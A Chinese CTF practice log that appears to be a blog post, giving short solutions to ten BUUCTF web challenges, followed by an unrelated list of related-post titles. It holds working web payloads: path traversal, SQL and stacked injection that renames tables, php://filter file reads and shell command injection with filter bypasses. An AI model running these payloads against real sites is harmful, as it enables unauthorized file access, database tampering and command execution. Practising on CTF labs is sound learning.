生活所迫,从头捡回来

第一题:

CTF-BUUCTF-[HCTF 2018]WarmUp

php代码审计题

四个if判断 只有最后一个走得通,就是把第二个?进行2次url加密
然后得到%253f 然后构造payload:file=source.php?file=source.php%253f../../../../../ffffllllaaaagggg
这样flag就出来了

第二题:

[极客大挑战 2019]EasySQL

万能密码直接出

第三题

[强网杯 2019]随便注

堆叠注入 很早之前写过的题了
最后就是word可以显示一串数字的表不能显示
然后rename把一串数字的表名改成word把原本的word改成其他的,最后1' or 1=1 #弄出来

1';rename tables `words` to `words1`;
rename tables `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);#

1' or 1=1 #

第四题

[极客大挑战 2019]Havefun

F12 然后?cat=dog

第五题

[SUCTF 2019]EasySQL

没过滤;有个特殊解法*,1
后端代码猜测是:

select $_GET['query'] || flag from flag


第六题:

[ACTF2020 新生赛]Include

Can you find out the flag?
就是那个把flag.php通过base64加密之后输出出来。

?file=php://filter/convert.base64-encode/resource=flag.php

然后去解密就是flag

第七题:

[极客大挑战 2019]Secret File

F12 跳转 抓包 secr3t.php

然后提示在flag.php里面
直接:file=php://filter/convert.base64-encode/resource=flag.php

第八题:

[极客大挑战 2019]LoveSQL

最简单的联合注入了,啥东西都没有

第九题:

[ACTF2020 新生赛]Exec

简单管道符 cat /flag

第十题:

[GXYCTF2019]Ping Ping Ping

?ip=127.0.0.1;cat$IFS$1`ls`
if(preg_match("/.*f.*l.*a.*g.*/", $ip)){die("fxck your flag!");

2021-5-5 buu刷题记录相关推荐

  1. BUU刷题记录——Misc(一)

    文章目录 前言: 1.九连环 2.面具下的flag 3.刷新过的图片 4.snake 5.[BJDCTF 2nd]圣火昭昭 前言: 最近学习之余在BUU上刷了几道misc题,有一些没接触过的知识,挺有 ...

  2. BUU刷题记录——5

    October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' uni ...

  3. [BUU刷题记录]day01-起步

    BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io contain ...

  4. BUU刷题记录(四)

    以下几题的ciscn是我先抽出来做的,因为不久就是ciscn,所以看看之前的题目,先不按顺序 十七.ciscn_2019_n_3 照例checksec一下 开启了nx和canary,relro只开启部 ...

  5. BUU刷题记录——6

    [De1CTF 2019]Giftbox De1CTF Web WriteUp – 赵 login命令处盲注获取登录密码 登陆后其他可用命令 targeting code position => ...

  6. buu刷题记录 [PWNHUB 公开赛 2018]傻 fufu 的工作日

    [PWNHUB 公开赛 2018]傻 fufu 的工作日 [PWNHUB 公开赛 2018]傻 fufu 的工作日(上传差异绕过) | (guokeya.github.io) /index.php.b ...

  7. [SWPUCTF] 2021新生赛之Crypto篇刷题记录(11)

    [SWPUCTF] 2021新生赛之Crypto篇刷题记录① [SWPUCTF 2021 新生赛]crypto6 [SWPUCTF 2021 新生赛]ez_caesar [SWPUCTF 2021 新 ...

  8. 蓝桥杯官网刷题记录python

    蓝桥杯官网刷题记录python 由于很多题都会在2020.2021.2022年省赛出现,有的在前面文章里做过的这里就不会再说了 一.空间 小蓝准备用 256MB 的内存空间开一个数组,数组的每个元素都 ...

  9. LeetCode刷题记录15——21. Merge Two Sorted Lists(easy)

    LeetCode刷题记录15--21. Merge Two Sorted Lists(easy) 目录 LeetCode刷题记录15--21. Merge Two Sorted Lists(easy) ...

最新文章

  1. 一个线程罢工的诡异事件
  2. 一生应该感谢的十种人
  3. Python基础教程:列表推导式对比For循环执行效率
  4. Management of your data
  5. castle windsor学习----- Services and Components 两者的定义
  6. Python编程及应用--数据分析与科学计算可视化培训班
  7. android Linkify的用法
  8. 73.fseek与宽字符读取文件
  9. outlook邮箱显示一直启动中_[转载]Outlook 2016 显示正在启动... 无法进入Outlook的解决方案...
  10. 各代iphone尺寸_iphone屏幕尺寸比例是多少,iphone各代屏幕尺寸大小介绍
  11. 将多个excel合并成一个excel
  12. 百度地图根据经纬度定位
  13. 计算机画图虚线,天正建筑怎么把直线变成虚线
  14. 【CS基础】计组计网
  15. 短信服务器部署位置,搭建短信服务器
  16. 【安防监控】如何利用无人机技术严防夏天溺水?
  17. cpu过载linux杀进程,Linux CPU过载判断以及分析
  18. 源码资本宣布完成人民币四期38亿新基金募集
  19. 安徽赛区2022数学建模国赛获奖名单
  20. Java 偏斜锁 轻量级锁 自环锁 重量级锁

热门文章

  1. 敏捷史话(十):我牺牲了滑雪时间,参加了一场软件革命——Jon Kern
  2. python动画实现1-animation
  3. Unity基础 3.3 2D物理系统 :刚体
  4. 陈峰:如何用AnySDK快速接入SDK上线
  5. 消息队列的数据积压问题
  6. 税务筹划怎么做?税务筹划特点包括哪些?
  7. 解决M1芯片Mac安装PS2021卡启动页问题,M1芯片Mac安装PS2021和PS2020教程!
  8. 解读2015年互联网UGC内容发展态势,安全事件频发
  9. httpclient模拟登陆微博问题
  10. 智能融合通信设备医院疫情防控视频实时传输解决方案